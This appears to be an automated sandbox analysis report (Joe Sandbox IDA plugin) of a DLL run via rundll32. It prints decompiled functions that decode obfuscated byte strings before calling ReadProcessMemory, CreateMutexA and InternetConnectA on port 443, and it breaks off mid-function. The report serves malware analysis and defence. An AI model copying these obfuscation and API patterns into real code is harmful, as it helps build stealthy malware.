                                                      • Opcode ID: 5e76c1a728da87cee61f0c0105a6956f23d33385183c61cde9b909f815131225
                                                      • Instruction ID: beea3622ec9057101f09af3b6f647e5055dc5717a0a7acea7fa4e5394bbddbea
                                                      • Opcode Fuzzy Hash: 5e76c1a728da87cee61f0c0105a6956f23d33385183c61cde9b909f815131225
                                                      • Instruction Fuzzy Hash: B22147619082CDBDEF02C6ED95447EEBFA55B22208F5840DDD49077282C6BA4719D7B2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7755C2, Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 89%
                                                      			E6E7755C2(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, long _a16) {
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				int _t44;
				DWORD* _t51;
				void* _t55;
				void* _t59;
				DWORD* _t61;
				void* _t63;

				_v24 = 0x65;
				_v23 = 0x1d;
				_v22 = 0x6f;
				_v21 = 0x71;
				_v20 = 0xf;
				_v19 = 0x50;
				_v18 = 0x4e;
				_v17 = 0x46;
				_v16 = 0x1d;
				_v15 = 0x7b;
				_v14 = 0x7b;
				_v13 = 0xd;
				_v12 = 0x1d;
				_v11 = 0x77;
				_v10 = 0x4e;
				_v9 = 0x50;
				_t51 = 0;
				_v8 = 0;
				_v7 = 4;
				_v6 = 0;
				_t59 = __ecx;
				if(_v6 == 0) {
					_push(0x7f);
					_t61 = 0;
					do {
						_t55 = 4;
						asm("cdq");
						asm("cdq");
						 *(_t63 + _t61 - 0x14) = (0 + (_t55 - ( *(_t63 + _t61 - 0x14) & 0x000000ff)) * 0x3e % 0) % 0;
						_t61 = _t61 + 1;
					} while (_t61 < 0x12);
					_v6 = 1;
					_t51 = 0;
				}
				E6E77657F(_t59,  &_v24);
				_t44 = ReadProcessMemory(_a4, _a8, _a12, _a16, _t51); // executed
				return _t44;
			}




























                                                      0x6e7755c8
                                                      0x6e7755cc
                                                      0x6e7755d0
                                                      0x6e7755d4
                                                      0x6e7755d8
                                                      0x6e7755dc
                                                      0x6e7755e0
                                                      0x6e7755e4
                                                      0x6e7755e8
                                                      0x6e7755ec
                                                      0x6e7755f0
                                                      0x6e7755f4
                                                      0x6e7755f8
                                                      0x6e7755fc
                                                      0x6e775600
                                                      0x6e775604
                                                      0x6e775609
                                                      0x6e77560b
                                                      0x6e77560e
                                                      0x6e775615
                                                      0x6e775619
                                                      0x6e77561e
                                                      0x6e775621
                                                      0x6e775623
                                                      0x6e775626
                                                      0x6e77562f
                                                      0x6e775635
                                                      0x6e77563b
                                                      0x6e77563e
                                                      0x6e775642
                                                      0x6e775643
                                                      0x6e775648
                                                      0x6e77564c
                                                      0x6e77564e
                                                      0x6e775655
                                                      0x6e775667
                                                      0x6e77566c

                                                      APIs
                                                      • ReadProcessMemory.KERNEL32(0000001D,0000001D,0000000F,00000065,00000000,00000065), ref: 6E775667
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID: F$N$N$P$P$e$o$q$w${${
                                                      • API String ID: 1726664587-1243226202
                                                      • Opcode ID: 4cbc165dda96b3de79fe0559a8db10c554311f91f88548c2ac1991508ac32bf4
                                                      • Instruction ID: 196ffc4283f4717aed012dd3f24da4f834f8d113ac5799b6e0befd3510e95ee3
                                                      • Opcode Fuzzy Hash: 4cbc165dda96b3de79fe0559a8db10c554311f91f88548c2ac1991508ac32bf4
                                                      • Instruction Fuzzy Hash: E421746190C2CCADEF12D6EC99457DEBFB51F22308F0880D9D5846B292C2BA4718D772
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E776599, Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 58synchronizationCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E6E776599(void* __ecx, void* __esi, CHAR* _a12) {
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				void* _t36;
				struct _SECURITY_ATTRIBUTES* _t43;
				void* _t47;
				void* _t51;
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t55;

				_v20 = 0x33;
				_v19 = 0xc;
				_v18 = 0x27;
				_v17 = 0x12;
				_v16 = 0x56;
				_v15 = 0x27;
				_v14 = 0x28;
				_v13 = 0x7b;
				_v12 = 0x56;
				_v11 = 0x27;
				_v10 = 0x6b;
				_v9 = 0x68;
				_v8 = 0x70;
				_t43 = 0;
				_v7 = 0;
				_t51 = __ecx;
				if(_v7 == 0) {
					_push(0x7f);
					_t53 = 0;
					do {
						_t47 = 0x70;
						asm("cdq");
						asm("cdq");
						 *(_t55 + _t53 - 0x10) = (0 + (_t47 - ( *(_t55 + _t53 - 0x10) & 0x000000ff)) * 0x18 % 0) % 0;
						_t53 =  &(_t53->nLength);
					} while (_t53 < 0xd);
					_v7 = 1;
					_t43 = 0;
				}
				E6E77657F(_t51,  &_v20);
				_t36 = CreateMutexA(_t43, _t43, _a12); // executed
				return _t36;
			}























                                                      0x6e77659f
                                                      0x6e7765a3
                                                      0x6e7765a7
                                                      0x6e7765ab
                                                      0x6e7765af
                                                      0x6e7765b3
                                                      0x6e7765b7
                                                      0x6e7765bb
                                                      0x6e7765bf
                                                      0x6e7765c3
                                                      0x6e7765c7
                                                      0x6e7765cb
                                                      0x6e7765d0
                                                      0x6e7765d4
                                                      0x6e7765d9
                                                      0x6e7765dd
                                                      0x6e7765e2
                                                      0x6e7765e5
                                                      0x6e7765e7
                                                      0x6e7765ea
                                                      0x6e7765f3
                                                      0x6e7765f9
                                                      0x6e7765ff
                                                      0x6e776602
                                                      0x6e776606
                                                      0x6e776607
                                                      0x6e77660c
                                                      0x6e776610
                                                      0x6e776612
                                                      0x6e776619
                                                      0x6e776623
                                                      0x6e776628

                                                      APIs
                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000033,00000033), ref: 6E776623
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CreateMutex
                                                      • String ID: '$'$'$($3$V$V$h$k$p${
                                                      • API String ID: 1964310414-58763407
                                                      • Opcode ID: 11759e8cef5e632f7328dfcd8520a3f4094a0600c530b8c8fce2d4b0188fb574
                                                      • Instruction ID: 51465ad7f6ec3d0a80562ce47504a34ccf63cebb55dc2598358c1798fc1d8ff7
                                                      • Opcode Fuzzy Hash: 11759e8cef5e632f7328dfcd8520a3f4094a0600c530b8c8fce2d4b0188fb574
                                                      • Instruction Fuzzy Hash: 3C11EC61D0C3C8ADEF0296FD5948BDEFFA51B22208F4845EDC49467283C6BA4308D331
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E772F23, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 64networkCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E6E772F23(void* __ecx, void* __edi, void* _a4, char* _a8) {
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				void* _t41;
				char* _t52;
				signed int _t56;
				void* _t58;
				void* _t59;

				_v24 = 6;
				_v23 = 7;
				_v22 = 0x75;
				_v21 = 0x60;
				_v20 = 0x26;
				_v19 = 7;
				_v18 = 0x60;
				_v17 = 0x75;
				_v16 = 0x17;
				_v15 = 0x6e;
				_v14 = 7;
				_v13 = 7;
				_v12 = 0x60;
				_v11 = 0x11;
				_v10 = 0x75;
				_v9 = 0x47;
				_v8 = 0x6b;
				_v7 = 0;
				_t58 = __ecx;
				if(_v7 == 0) {
					_t52 = 0;
					_t56 = 0x7f;
					do {
						asm("cdq");
						asm("cdq");
						 *(_t59 + _t52 - 0x14) = (_t56 + (( *(_t59 + _t52 - 0x14) & 0x000000ff) - 0x6b) * 0x25 % _t56) % _t56;
						_t52 = _t52 + 1;
					} while (_t52 < 0x11);
					_v7 = 1;
				}
				E6E77657F(_t58,  &_v24);
				_t41 = InternetConnectA(_a4, _a8, 0x1bb, 0, 0, 3, 0, 0); // executed
				return _t41;
			}


























                                                      0x6e772f29
                                                      0x6e772f2d
                                                      0x6e772f31
                                                      0x6e772f35
                                                      0x6e772f39
                                                      0x6e772f3d
                                                      0x6e772f41
                                                      0x6e772f45
                                                      0x6e772f49
                                                      0x6e772f4d
                                                      0x6e772f51
                                                      0x6e772f55
                                                      0x6e772f59
                                                      0x6e772f5d
                                                      0x6e772f61
                                                      0x6e772f65
                                                      0x6e772f6a
                                                      0x6e772f73
                                                      0x6e772f77
                                                      0x6e772f7c
                                                      0x6e772f81
                                                      0x6e772f83
                                                      0x6e772f84
                                                      0x6e772f91
                                                      0x6e772f97
                                                      0x6e772f9a
                                                      0x6e772f9e
                                                      0x6e772f9f
                                                      0x6e772fa4
                                                      0x6e772fa8
                                                      0x6e772faf
                                                      0x6e772fc5
                                                      0x6e772fca

                                                      APIs
                                                      • InternetConnectA.WININET(00000060,00000017,000001BB,00000000,00000000,00000003,00000000,00000000,00000006), ref: 6E772FC5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ConnectInternet
                                                      • String ID: &$G$`$`$`$k$n$u$u$u
                                                      • API String ID: 3050416762-1700123205
                                                      • Opcode ID: 1b0bb7303f152fa563ed7bafe9dbd39e5f82f0dc0c8ea2695b11d0ac836a57cf
                                                      • Instruction ID: f78aa483047bde9a7a2c9d643a8d4610f6db0aafb6035bcfcd6f09f6c6cea7c3
                                                      • Opcode Fuzzy Hash: 1b0bb7303f152fa563ed7bafe9dbd39e5f82f0dc0c8ea2695b11d0ac836a57cf
                                                      • Instruction Fuzzy Hash: 5B21445090C2CCBCEF02C6EDC554BDEBFA54B1224CF1840D8D4846B292D2FA5718D372
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E774985, Relevance: 12.1, APIs: 8, Instructions: 128memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E6E774985(intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, void** _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				void** _v32;
				intOrPtr* _v36;
				void* __ebx;
				void* __ebp;
				signed int _t40;
				void* _t47;
				long _t52;
				long _t57;
				intOrPtr _t65;
				intOrPtr* _t70;
				intOrPtr _t80;
				signed int _t81;
				void* _t83;
				intOrPtr _t85;
				signed int _t86;
				void* _t87;

				_t84 = __esi;
				_t82 = __edi;
				_t80 = __edx;
				_t71 = __ecx;
				_t40 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t40 ^ _t86;
				_v32 = _a4;
				_t70 = __ecx;
				_v36 = _a8;
				if( *__ecx != 0) {
					_push(__esi);
					_push(__edi);
					_t83 = 0;
					_v20 = 0;
					_v16 = 0;
					_v24 = 0;
					while(1) {
						_t11 = E6E77111C() + 4; // 0x4, executed
						_t47 = E6E77865C(_t11, _t84,  *_t70,  &_v16, _t71, _t71); // executed
						_t84 = _t47;
						if(_t84 == 0) {
							break;
						}
						_t52 = _v16;
						if(_t52 != 0) {
							if(_t83 != 0) {
								_t85 = _v20;
								_t57 = RtlReAllocateHeap(GetProcessHeap(), 0, _t83, _t52 + _t85); // executed
								if(_t57 != 0) {
									_t83 = _t57;
									goto L11;
								} else {
									HeapFree(GetProcessHeap(), _t57, _t83);
									_t83 = 0;
									goto L14;
								}
							} else {
								_t83 = HeapAlloc(GetProcessHeap(), _t83, _t52);
								if(_t83 == 0) {
									L14:
									_t84 = 0;
								} else {
									_t85 = _v20;
									L11:
									_v12 = _v12 & 0x00000000;
									_v28 = _t85 + _t83;
									_t21 = E6E77111C() + 4; // 0x4
									_t84 = E6E7785BB(_t21, _t83,  *_t70, _t85 + _t83, _v16,  &_v12);
									if(_t84 == 0) {
										 *((intOrPtr*)(_t70 + 4)) = E6E7752ED(E6E77111C(), _t83);
										HeapFree(GetProcessHeap(), 0, _t83);
										goto L14;
									} else {
										_t81 = _v12;
										_t65 = E6E772CBD(_v28, _t81, _a12, _a16, _v24);
										_t87 = _t87 + 0xc;
										_v24 = _t65;
										_v20 = _v20 + _t81;
									}
								}
							}
							_t52 = _v16;
						}
						_t71 = _v24;
						_t80 = _v20;
						_v20 = _t80;
						if(_t84 != 0) {
							if(_t52 != 0) {
								continue;
							} else {
								 *_v32 = _t83;
								 *_v36 = _t80;
							}
						}
						L20:
						_pop(_t82);
						_pop(_t84);
						goto L21;
					}
					 *((intOrPtr*)(_t70 + 4)) = E6E7752ED(E6E77111C(), _t83);
					goto L20;
				} else {
					 *((intOrPtr*)(__ecx + 4)) = 6;
				}
				L21:
				return E6E778727(_t70, _v8 ^ _t86, _t80, _t82, _t84);
			}

























                                                      0x6e774985
                                                      0x6e774985
                                                      0x6e774985
                                                      0x6e774985
                                                      0x6e77498b
                                                      0x6e774992
                                                      0x6e774999
                                                      0x6e77499c
                                                      0x6e7749a1
                                                      0x6e7749a8
                                                      0x6e7749b6
                                                      0x6e7749b7
                                                      0x6e7749b8
                                                      0x6e7749ba
                                                      0x6e7749bd
                                                      0x6e7749c0
                                                      0x6e7749c3
                                                      0x6e7749d0
                                                      0x6e7749d3
                                                      0x6e7749d8
                                                      0x6e7749dc
                                                      0x00000000
                                                      0x00000000
                                                      0x6e7749e2
                                                      0x6e7749e7
                                                      0x6e7749ef
                                                      0x6e774a0f
                                                      0x6e774a1f
                                                      0x6e774a27
                                                      0x6e774a3c
                                                      0x00000000
                                                      0x6e774a29
                                                      0x6e774a32
                                                      0x6e774a38
                                                      0x00000000
                                                      0x6e774a38
                                                      0x6e7749f1
                                                      0x6e774a00
                                                      0x6e774a04
                                                      0x6e774aa3
                                                      0x6e774aa3
                                                      0x6e774a0a
                                                      0x6e774a0a
                                                      0x6e774a3e
                                                      0x6e774a3e
                                                      0x6e774a4f
                                                      0x6e774a57
                                                      0x6e774a5f
                                                      0x6e774a63
                                                      0x6e774a93
                                                      0x6e774a9d
                                                      0x00000000
                                                      0x6e774a65
                                                      0x6e774a68
                                                      0x6e774a74
                                                      0x6e774a79
                                                      0x6e774a7c
                                                      0x6e774a7f
                                                      0x6e774a7f
                                                      0x6e774a63
                                                      0x6e774a04
                                                      0x6e774aa5
                                                      0x6e774aa5
                                                      0x6e774aa8
                                                      0x6e774aab
                                                      0x6e774ab1
                                                      0x6e774ab6
                                                      0x6e774aba
                                                      0x00000000
                                                      0x6e774ac0
                                                      0x6e774ac3
                                                      0x6e774ac8
                                                      0x6e774ac8
                                                      0x6e774aba
                                                      0x6e774adb
                                                      0x6e774adb
                                                      0x6e774ade
                                                      0x00000000
                                                      0x6e774ade
                                                      0x6e774ad8
                                                      0x00000000
                                                      0x6e7749aa
                                                      0x6e7749aa
                                                      0x6e7749aa
                                                      0x6e774adf
                                                      0x6e774aeb

                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 6E7749F3
                                                      • HeapAlloc.KERNEL32(00000000,?,?), ref: 6E7749FA
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
                                                      • Opcode ID: d6b163b575dea6f5765c49690f43949760303f325d8dd294b7dad3abba50fbd9
                                                      • Instruction ID: 89c84310b8800a2dbf91a4903d1aeb38803645defbba5f56ec8217b236c60d8d
                                                      • Opcode Fuzzy Hash: d6b163b575dea6f5765c49690f43949760303f325d8dd294b7dad3abba50fbd9
                                                      • Instruction Fuzzy Hash: D6412C75D006159FCF21CFE4DA48AAFBBF8EF49300B124469E811AB214EB70D901DFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7998B0, Relevance: 11.1, APIs: 2, Strings: 4, Instructions: 551COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstChangeNotificationA.KERNEL32(00000000,00000001,00000020,6E8243FC,00000007), ref: 6E799A6A
                                                      • GetWindowsDirectoryA.KERNEL32(6E868168,000004EB,6E84999C,00000000), ref: 6E799FAA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ChangeDirectoryFindFirstNotificationWindows
                                                      • String ID: <para>To do this</para> </headerEntry> <headerEntry> <para>Say this</para> $Sea S$aXi$book D
                                                      • API String ID: 3662519435-1689309788
                                                      • Opcode ID: 4f4eac1893d4ae99e5eb3fe9280862e3e6eaa0ec8338197176d2992e3c25868b
                                                      • Instruction ID: 4332c74a8178218e13b0d292b1ce6e6efb2ba7c12f88c7324f82fbea604c060d
                                                      • Opcode Fuzzy Hash: 4f4eac1893d4ae99e5eb3fe9280862e3e6eaa0ec8338197176d2992e3c25868b
                                                      • Instruction Fuzzy Hash: FC32B2B2A01556CFDF14DFACDA916ECBBF2FB8A314F14412AD459A3791E3389805CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E778DB5, Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E6E778DB5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				E6E7794D0(__ebx, __edi, __esi, 0x6e78a4a8, 0x10);
				_t34 =  *0x6e78c984; // 0x1
				if(_t34 > 0) {
					 *0x6e78c984 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6E778985();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6e78c960 - 2;
					if( *0x6e78c960 != 2) {
						E6E7791BB(_t68, 1, __esi, 7);
						asm("int3");
						E6E7794D0(__ebx, 1, __esi, 0x6e78a4d0, 0xc);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6E778F70( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6E778C5B(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_push(_t72);
									_push( *((intOrPtr*)(_t82 + 8)));
									_t42 = E6E7795AE();
									_t76 = _t42;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_push(_t42);
											_push( *((intOrPtr*)(_t82 + 8)));
											_t45 = E6E7795AE();
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6E778DB5(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E6E778F70( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6E778C5B(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6E778F70( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6e78c984 - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6E778A50(__ebx, _t61, 1, __esi);
						E6E7795C0();
						E6E779621();
						 *0x6e78c960 =  *0x6e78c960 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6E778E4A();
						_t54 = E6E778BF1(_t61,  *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6E778E57();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

















                                                      0x6e778db5
                                                      0x6e778dbc
                                                      0x6e778dc1
                                                      0x6e778dc8
                                                      0x6e778dcf
                                                      0x6e778dd7
                                                      0x6e778dda
                                                      0x6e778de3
                                                      0x6e778de6
                                                      0x6e778de9
                                                      0x6e778df0
                                                      0x6e778e5f
                                                      0x6e778e64
                                                      0x6e778e6c
                                                      0x6e778e71
                                                      0x6e778e74
                                                      0x6e778e76
                                                      0x6e778e87
                                                      0x6e778e87
                                                      0x6e778e8b
                                                      0x6e778e8e
                                                      0x6e778e9a
                                                      0x6e778e9a
                                                      0x6e778ea7
                                                      0x6e778ea9
                                                      0x6e778eac
                                                      0x6e778eae
                                                      0x6e778eb9
                                                      0x6e778ebe
                                                      0x6e778ec0
                                                      0x6e778ec3
                                                      0x6e778ec5
                                                      0x00000000
                                                      0x00000000
                                                      0x6e778ec5
                                                      0x6e778e90
                                                      0x6e778e90
                                                      0x6e778e93
                                                      0x00000000
                                                      0x6e778e95
                                                      0x6e778e95
                                                      0x6e778ecb
                                                      0x6e778ecb
                                                      0x6e778ecc
                                                      0x6e778ecd
                                                      0x6e778ed0
                                                      0x6e778ed5
                                                      0x6e778ed7
                                                      0x6e778eda
                                                      0x6e778edd
                                                      0x6e778edf
                                                      0x6e778ee1
                                                      0x6e778ee3
                                                      0x6e778ee4
                                                      0x6e778ee5
                                                      0x6e778ee8
                                                      0x6e778eed
                                                      0x6e778eef
                                                      0x6e778eef
                                                      0x6e778ef5
                                                      0x6e778ef6
                                                      0x6e778efb
                                                      0x6e778f01
                                                      0x6e778f01
                                                      0x6e778ee1
                                                      0x6e778f06
                                                      0x6e778f08
                                                      0x6e778f0f
                                                      0x6e778f19
                                                      0x6e778f1b
                                                      0x6e778f1e
                                                      0x6e778f20
                                                      0x6e778f2c
                                                      0x6e778f54
                                                      0x6e778f54
                                                      0x6e778f0a
                                                      0x6e778f0a
                                                      0x6e778f0d
                                                      0x00000000
                                                      0x00000000
                                                      0x6e778f0d
                                                      0x6e778f08
                                                      0x6e778e93
                                                      0x6e778f57
                                                      0x6e778f5e
                                                      0x6e778e78
                                                      0x6e778e78
                                                      0x6e778e7e
                                                      0x00000000
                                                      0x6e778e80
                                                      0x6e778e80
                                                      0x6e778e80
                                                      0x6e778e7e
                                                      0x6e778f63
                                                      0x6e778f6f
                                                      0x6e778df2
                                                      0x6e778df2
                                                      0x6e778df7
                                                      0x6e778dfc
                                                      0x6e778e01
                                                      0x6e778e08
                                                      0x6e778e0c
                                                      0x6e778e16
                                                      0x6e778e22
                                                      0x6e778e24
                                                      0x6e778e24
                                                      0x6e778e26
                                                      0x6e778e29
                                                      0x6e778e30
                                                      0x6e778e35
                                                      0x00000000
                                                      0x6e778e35
                                                      0x6e778dca
                                                      0x6e778dca
                                                      0x6e778e37
                                                      0x6e778e3a
                                                      0x6e778e46
                                                      0x6e778e46

                                                      APIs
                                                      • __RTC_Initialize.LIBCMT ref: 6E778DFC
                                                      • ___scrt_uninitialize_crt.LIBCMT ref: 6E778E16
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Initialize___scrt_uninitialize_crt
                                                      • String ID:
                                                      • API String ID: 2442719207-0
                                                      • Opcode ID: a85b6cecfcca34402be76340483023ecbeb07a5deeaaa74002c6838bdfd5dd57
                                                      • Instruction ID: c8d2ba4a5501e1e2fb3e156ae4cab2346622f6004f4a616f7684ef6fdab325d2
                                                      • Opcode Fuzzy Hash: a85b6cecfcca34402be76340483023ecbeb07a5deeaaa74002c6838bdfd5dd57
                                                      • Instruction Fuzzy Hash: E541E272A05635AEEF308FE5CE48AAE7B79EF917A4F110A35E81467260C7704E01CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77D6CE, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E77D6CE(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t13;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6e78cec0 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6e786008 + _t22 * 4);
						_t13 = LoadLibraryExW(_t23, 0, 0x800); // executed
						_t32 = _t13;
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
